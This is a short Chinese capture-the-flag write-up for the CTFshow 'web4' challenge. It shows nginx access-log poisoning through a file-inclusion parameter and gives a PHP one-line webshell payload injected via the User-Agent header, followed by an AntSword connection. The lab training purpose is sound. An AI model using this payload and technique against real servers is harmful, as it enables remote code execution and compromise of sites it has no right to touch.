CTFshow web4 详解

进入题目,看到只有一句文件包含的提示。

 文件包含我们尝试了input协议和data协议,但是都不可行,应该都被禁用了。所以我们再看看它的数据包吧。

我们发现该道题使用的是nginx服务器,那我们想到可不可以通过日志文件进行写码来得到flag呢,所以我们访问日志看看

?url=/var/log/nginx/access.log

 查看日志发现,每访问一次数据包中的UA头会被写进日志中,那就尝试在UA头中写码

<?php eval($_POST['cmd']); ?>

 在UA头后插入一句话木马后日志文件里并未显示说明木马已经被解析了,然后使用蚁剑连接。

 连接后,flag就在网页根目录中

 

 

  • 5
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 5
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 5
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值